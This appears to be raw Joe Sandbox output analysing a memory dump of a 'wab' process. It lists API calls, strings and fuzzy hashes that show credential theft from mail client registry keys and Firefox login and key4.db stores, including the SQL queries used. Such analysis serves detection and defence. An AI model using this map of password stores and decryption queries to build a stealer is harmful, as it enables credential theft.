                                      • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                      • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                      • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                      • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                      APIs
                                      • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: EnumNamesResource
                                      • String ID:
                                      • API String ID: 3334572018-0
                                      • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                      • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                      • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                      • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                      APIs
                                      • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CloseFind
                                      • String ID:
                                      • API String ID: 1863332320-0
                                      • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                      • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                      • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                      • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Open
                                      • String ID:
                                      • API String ID: 71445658-0
                                      • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                      • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                      • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                      • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                      APIs
                                      • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AttributesFile
                                      • String ID:
                                      • API String ID: 3188754299-0
                                      • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                      • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                      • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                      • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                      APIs
                                      • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                      • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                      • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                      • API String ID: 2238633743-192783356
                                      • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                      • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                      • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                      • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileString_mbscmpstrlen
                                      • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                      • API String ID: 3963849919-1658304561
                                      • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                      • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                      • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                      • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@??3@memcpymemset
                                      • String ID: (yE$(yE$(yE
                                      • API String ID: 1865533344-362086290
                                      • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                      • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                      • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                      • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                      APIs
                                      • memset.MSVCRT ref: 0040EBD8
                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                      • memset.MSVCRT ref: 0040EC2B
                                      • memset.MSVCRT ref: 0040EC47
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,0040F26F,000000FF,?,00000104,?,?,?,?,?,?,0040F26F,?,00000000), ref: 0040EC5E
                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00000104,00000000,00000000,?,?,?,?,?,?,0040F26F,?), ref: 0040EC7D
                                      • memset.MSVCRT ref: 0040ECDD
                                      • memset.MSVCRT ref: 0040ECF2
                                      • _mbscpy.MSVCRT ref: 0040ED59
                                      • _mbscpy.MSVCRT ref: 0040ED6F
                                      • _mbscpy.MSVCRT ref: 0040ED85
                                      • _mbscpy.MSVCRT ref: 0040ED9B
                                      • _mbscpy.MSVCRT ref: 0040EDB1
                                      • _mbscpy.MSVCRT ref: 0040EDC7
                                      • memset.MSVCRT ref: 0040EDE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_mbscpy$ByteCharMultiWidestrlen
                                      • String ID: $"$$$$$+$,$/$8$:$e$imap://%s$mailbox://%s$smtp://%s
                                      • API String ID: 3137614212-1455797042
                                      • Opcode ID: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                      • Instruction ID: d6da7a2470a9305ce2943739f2db0c21907611b241beb19e2f55b2037bda17a7
                                      • Opcode Fuzzy Hash: 2f5d5fe8e7071613619405723c2e306f1b068e67b5eb1c199c09519f7d14e143
                                      • Instruction Fuzzy Hash: 9522A021C047DA9DDB31C6B89C45BCDBB749F16234F0803EAF1A8AB2D2D7345A46CB65
                                      APIs
                                        • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                        • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                        • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                        • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                        • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                      • memset.MSVCRT ref: 0040E5B8
                                      • memset.MSVCRT ref: 0040E5CD
                                      • _mbscpy.MSVCRT ref: 0040E634
                                      • _mbscpy.MSVCRT ref: 0040E64A
                                      • _mbscpy.MSVCRT ref: 0040E660
                                      • _mbscpy.MSVCRT ref: 0040E676
                                      • _mbscpy.MSVCRT ref: 0040E68C
                                      • _mbscpy.MSVCRT ref: 0040E69F
                                      • memset.MSVCRT ref: 0040E6B5
                                      • memset.MSVCRT ref: 0040E6CC
                                        • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                        • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                      • memset.MSVCRT ref: 0040E736
                                      • memset.MSVCRT ref: 0040E74F
                                      • sprintf.MSVCRT ref: 0040E76D
                                      • sprintf.MSVCRT ref: 0040E788
                                      • _strcmpi.MSVCRT ref: 0040E79E
                                      • _strcmpi.MSVCRT ref: 0040E7B7
                                      • _strcmpi.MSVCRT ref: 0040E7D3
                                      • memset.MSVCRT ref: 0040E858
                                      • sprintf.MSVCRT ref: 0040E873
                                      • _strcmpi.MSVCRT ref: 0040E889
                                      • _strcmpi.MSVCRT ref: 0040E8A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$_mbscpy$_strcmpi$sprintf$strlen$CloseFileHandleSize_mbsicmpmemcmp
                                      • String ID: encryptedPassword$encryptedUsername$hostname$httpRealm$imap://%s$logins$mailbox://%s$passwordField$smtp://%s$usernameField
                                      • API String ID: 4171719235-3943159138
                                      • Opcode ID: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                      • Instruction ID: e6e1aca5762f927b6bef3ecf047b01a22afe4fa283f9592a273acc07610826c1
                                      • Opcode Fuzzy Hash: bf0017e867bbd9971ab7950a12d93933283a76136da63b011136ffef7bc63502
                                      • Instruction Fuzzy Hash: D6B152B2D04119AADF10EBA1DC41BDEB7B8EF04318F1444BBF548B7181EB39AA558F58
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 0041042E
                                      • GetDlgItem.USER32(?,000003E8), ref: 0041043A
                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 00410449
                                      • GetWindowLongA.USER32(?,000000F0), ref: 00410455
                                      • GetWindowLongA.USER32(00000000,000000EC), ref: 0041045E
                                      • GetWindowLongA.USER32(?,000000EC), ref: 0041046A
                                      • GetWindowRect.USER32(00000000,?), ref: 0041047C
                                      • GetWindowRect.USER32(?,?), ref: 00410487
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041049B
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004104A9
                                      • GetDC.USER32 ref: 004104E2
                                      • strlen.MSVCRT ref: 00410522
                                      • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 00410533
                                      • ReleaseDC.USER32(?,?), ref: 00410580
                                      • sprintf.MSVCRT ref: 00410640
                                      • SetWindowTextA.USER32(?,?), ref: 00410654
                                      • SetWindowTextA.USER32(?,00000000), ref: 00410672
                                      • GetDlgItem.USER32(?,00000001), ref: 004106A8
                                      • GetWindowRect.USER32(00000000,?), ref: 004106B8
                                      • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004106C6
                                      • GetClientRect.USER32(?,?), ref: 004106DD
                                      • GetWindowRect.USER32(?,?), ref: 004106E7
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 0041072D
                                      • GetClientRect.USER32(?,?), ref: 00410737
                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 0041076F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                      • String ID: %s:$EDIT$STATIC
                                      • API String ID: 1703216249-3046471546
                                      • Opcode ID: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                      • Instruction ID: 9785898008ba7037e97d6a181d6b2a38f1c87ee61eba0ca9b836c22844d1efbd
                                      • Opcode Fuzzy Hash: 128263c36ef5345d2fa2b7d273f179e903fb80143bcb01b5421768440fe41b9e
                                      • Instruction Fuzzy Hash: 36B1DF75508341AFD750DFA8C985E6BBBE9FF88704F00492DF59982261DB75E804CF16
                                      APIs
                                      • memset.MSVCRT ref: 004024F5
                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                      • _mbscpy.MSVCRT ref: 00402533
                                      • _mbscpy.MSVCRT ref: 004025FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpy$QueryValuememset
                                      • String ID: HTTPMail$HTTPMail Port$HTTPMail Secure Connection$HTTPMail Server$HTTPMail User Name$IMAP$IMAP Port$IMAP Secure Connection$IMAP Server$IMAP User Name$POP3$POP3 Port$POP3 Secure Connection$POP3 Server$POP3 User Name$Password2$SMTP$SMTP Display Name$SMTP Email Address$SMTP Port$SMTP Secure Connection$SMTP Server$SMTP USer Name
                                      • API String ID: 168965057-606283353
                                      • Opcode ID: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                      • Instruction ID: 7e64c7f7efb5926a908898138c7c80272d7c47f2ed846a803f17f87345e13469
                                      • Opcode Fuzzy Hash: db52dd6227f64e1606ed286d3875c760bf9a06f6856d1fddeb2df187246517b6
                                      • Instruction Fuzzy Hash: 0A5173B640221DABEF60DF91CC85ADD7BA8EF04318F54846BF908A7141D7BD9588CF98
                                      APIs
                                      • memset.MSVCRT ref: 00402869
                                        • Part of subcall function 004029A2: RegQueryValueExA.ADVAPI32(00000400,?,00000000,?,?,?), ref: 004029D3
                                      • _mbscpy.MSVCRT ref: 004028A3
                                        • Part of subcall function 004029A2: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000), ref: 00402A01
                                      • _mbscpy.MSVCRT ref: 0040297B
                                        • Part of subcall function 00410AB6: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402936,?,?,?,?,00402936,?,?), ref: 00410AD5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: QueryValue_mbscpy$ByteCharMultiWidememset
                                      • String ID: Display Name$Email$HTTP$HTTP Port$HTTP Server URL$HTTP User$HTTPMail Use SSL$IMAP$IMAP Port$IMAP Server$IMAP Use SPA$IMAP User$POP3$POP3 Port$POP3 Server$POP3 Use SPA$POP3 User$Password$SMTP$SMTP Port$SMTP Server$SMTP Use SSL$SMTP User
                                      • API String ID: 1497257669-167382505
                                      • Opcode ID: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                      • Instruction ID: 8a18399fb9ab4dbf3293ae90a7c33dbf32d2aa74b1f684e89f9c0cb2c5d46144
                                      • Opcode Fuzzy Hash: c64c38dba70c8bbb1f63c27aa7482a3f9d9ec3ce6935057e79b9b5bca8a744c6
                                      • Instruction Fuzzy Hash: F1514CB190124DAFEF60EF61CD85ACD7BB8FF04308F14812BF92466191D7B999488F98
                                      APIs
                                      • EndDialog.USER32(?,?), ref: 0040FC88
                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FCA0
                                      • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 0040FCBF
                                      • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 0040FCCC
                                      • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0040FCD5
                                      • memset.MSVCRT ref: 0040FCFD
                                      • memset.MSVCRT ref: 0040FD1D
                                      • memset.MSVCRT ref: 0040FD3B
                                      • memset.MSVCRT ref: 0040FD54
                                      • memset.MSVCRT ref: 0040FD72
                                      • memset.MSVCRT ref: 0040FD8B
                                      • GetCurrentProcess.KERNEL32 ref: 0040FD93
                                      • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0040FDB8
                                      • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0040FDEE
                                      • memset.MSVCRT ref: 0040FE45
                                      • GetCurrentProcessId.KERNEL32 ref: 0040FE53
                                      • memcpy.MSVCRT ref: 0040FE82
                                      • _mbscpy.MSVCRT ref: 0040FEA4
                                      • sprintf.MSVCRT ref: 0040FF0F
                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 0040FF28
                                      • GetDlgItem.USER32(?,000003EA), ref: 0040FF32
                                      • SetFocus.USER32(00000000), ref: 0040FF39
                                      Strings
                                      • {Unknown}, xrefs: 0040FD02
                                      • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 0040FF09
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                      • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                      • API String ID: 1428123949-3474136107
                                      • Opcode ID: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                      • Instruction ID: dbacf55a19a30e1480a431b78f30a2e126a23dc86512cc8492e46cc2065c5524
                                      • Opcode Fuzzy Hash: d86657001ae41ff369873dc728ed0a742e0e79a3b96cce1ecbd5be397a74016d
                                      • Instruction Fuzzy Hash: 6371A972808345BFE7319B51EC41EDB7B9CFB84345F04043AF644921A2DA79DE49CB6A
                                      APIs
                                      • GetDlgItem.USER32(?,000003EC), ref: 004010BC
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 004010CE
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401103
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401110
                                      • GetDlgItem.USER32(?,000003EC), ref: 0040113E
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401150
                                      • LoadCursorA.USER32(00000067), ref: 0040115F
                                      • SetCursor.USER32(00000000,?,?), ref: 00401166
                                      • GetDlgItem.USER32(?,000003EE), ref: 00401186
                                      • ChildWindowFromPoint.USER32(?,?,?), ref: 00401193
                                      • GetDlgItem.USER32(?,000003EC), ref: 004011AD
                                      • SetBkMode.GDI32(?,00000001), ref: 004011B9
                                      • SetTextColor.GDI32(?,00C00000), ref: 004011C7
                                      • GetSysColorBrush.USER32(0000000F), ref: 004011CF
                                      • GetDlgItem.USER32(?,000003EE), ref: 004011EF
                                      • EndDialog.USER32(?,00000001), ref: 0040121A
                                      • DeleteObject.GDI32(?), ref: 00401226
                                      • GetDlgItem.USER32(?,000003ED), ref: 0040124A
                                      • ShowWindow.USER32(00000000), ref: 00401253
                                      • GetDlgItem.USER32(?,000003EE), ref: 0040125F
                                      • ShowWindow.USER32(00000000), ref: 00401262
                                      • SetDlgItemTextA.USER32(?,000003EE,0045A5E0), ref: 00401273
                                      • memset.MSVCRT ref: 0040128E
                                      • SetWindowTextA.USER32(?,00000000), ref: 004012AA
                                      • SetDlgItemTextA.USER32(?,000003EA,?), ref: 004012C2
                                      • SetDlgItemTextA.USER32(?,000003EC,?), ref: 004012D3
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogLoadModeObjectmemset
                                      • String ID:
                                      • API String ID: 2998058495-0
                                      • Opcode ID: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                      • Instruction ID: d99c78195822e95bfb56004c40aa855916ae81609c5fc0371f4bc40fa141afdc
                                      • Opcode Fuzzy Hash: 6a1a0106eeb2062a51b7786bb007bda916ff9620d132a9d16e41ded145a17969
                                      • Instruction Fuzzy Hash: 2661AA35800248EBDF12AFA0DD85BAE7FA5BB05304F1881B6F904BA2F1C7B59D50DB58
                                      APIs
                                        • Part of subcall function 00409070: LoadMenuA.USER32(00000000), ref: 00409078
                                        • Part of subcall function 00409070: sprintf.MSVCRT ref: 0040909B
                                      • SetMenu.USER32(?,00000000), ref: 0040BD23
                                      • SendMessageA.USER32(00000000,00000404,00000001,?), ref: 0040BD56
                                      • LoadImageA.USER32(00000068,00000000,00000000,00000000,00009060), ref: 0040BD6C
                                      • CreateWindowExA.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000), ref: 0040BDCC
                                      • LoadIconA.USER32(00000066,00000000), ref: 0040BE3B
                                      • _strcmpi.MSVCRT ref: 0040BE93
                                      • RegDeleteKeyA.ADVAPI32(80000001,0044C52F), ref: 0040BEA8
                                      • SetFocus.USER32(?,00000000), ref: 0040BECE
                                      • GetFileAttributesA.KERNEL32(0045AB10), ref: 0040BEE7
                                      • GetTempPathA.KERNEL32(00000104,0045AB10), ref: 0040BEF7
                                      • strlen.MSVCRT ref: 0040BEFE
                                      • strlen.MSVCRT ref: 0040BF0C
                                      • RegisterClipboardFormatA.USER32(commdlg_FindReplace), ref: 0040BF68
                                        • Part of subcall function 00404B87: strlen.MSVCRT ref: 00404BA4
                                        • Part of subcall function 00404B87: SendMessageA.USER32(?,0000101B,?,?), ref: 00404BC8
                                      • SendMessageA.USER32(?,00000404,00000002,?), ref: 0040BFB3
                                      • SendMessageA.USER32(?,00000401,00001001,00000000), ref: 0040BFC6
                                      • memset.MSVCRT ref: 0040BFDB
                                      • SetWindowTextA.USER32(?,?), ref: 0040BFFF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$Loadstrlen$MenuWindow$AttributesClipboardCreateDeleteFileFocusFormatIconImagePathRegisterTempText_strcmpimemsetsprintf
                                      • String ID: /noloadsettings$SysListView32$commdlg_FindReplace$report.html
                                      • API String ID: 2303586283-933021314
                                      • Opcode ID: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                      • Instruction ID: 018683a0c001df71ea8fb117e25ab04faf3265e4b472b332b07084323bdedb2f
                                      • Opcode Fuzzy Hash: c18e167360c9832f76d4060667def10e2fdfd132df2f90ae90de526b0002aaa1
                                      • Instruction Fuzzy Hash: 5DC1C071644388FFEB15DF64CC45BDABBA5FF14304F04016AFA44A7292C7B5A904CBA9
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcmp$memcpy
                                      • String ID: %s mode not allowed: %s$,nE$@$BINARY$G+D$G+D$access$cache$file:$invalid uri authority: %.*s$localhost$mode$no such %s mode: %s$no such vfs: %s$vfs
                                      • API String ID: 231171946-2189169393
                                      • Opcode ID: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                      • Instruction ID: 1e7ca99fc42d5c672073ce6a9752caade8d3c68442cd6653d693641e17a54130
                                      • Opcode Fuzzy Hash: 1a21d1ba4c7cba85a31c946e058b01c84a8823fb64876f3ea2b96bfae0f1469d
                                      • Instruction Fuzzy Hash: 30D13671904245ABFF248F68CA407EEBBB1AF15305F54406FF844A7341D3F89A86CB99
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscat$memsetsprintf$_mbscpy
                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                      • API String ID: 633282248-1996832678
                                      • Opcode ID: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                      • Instruction ID: de3fd18750e25ac655c57e1f527e3f4ad82db586d7f8767584d5c6c21a88759b
                                      • Opcode Fuzzy Hash: 0c13a19f140ebb8c22a2bc6978d10b948314cef2adf7705f28c84de1f2e61c89
                                      • Instruction Fuzzy Hash: 0C31A9B28056557AFB20EB559C42FDAB3ACDF14315F10419FF21462182EA7CAEC4865D
                                      APIs
                                      Strings
                                      • SELECT item1,item2 FROM metadata WHERE id = 'password', xrefs: 004067C4
                                      • key4.db, xrefs: 00406756
                                      • , xrefs: 00406834
                                      • SELECT a11,a102 FROM nssPrivate, xrefs: 00406933
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memcmp$memsetstrlen
                                      • String ID: $SELECT a11,a102 FROM nssPrivate$SELECT item1,item2 FROM metadata WHERE id = 'password'$key4.db
                                      • API String ID: 3614188050-3983245814
                                      • Opcode ID: 36044ac86a6ba26f1195c251ddbd5a0cf0b65534d70e88717d104d14f24e386f
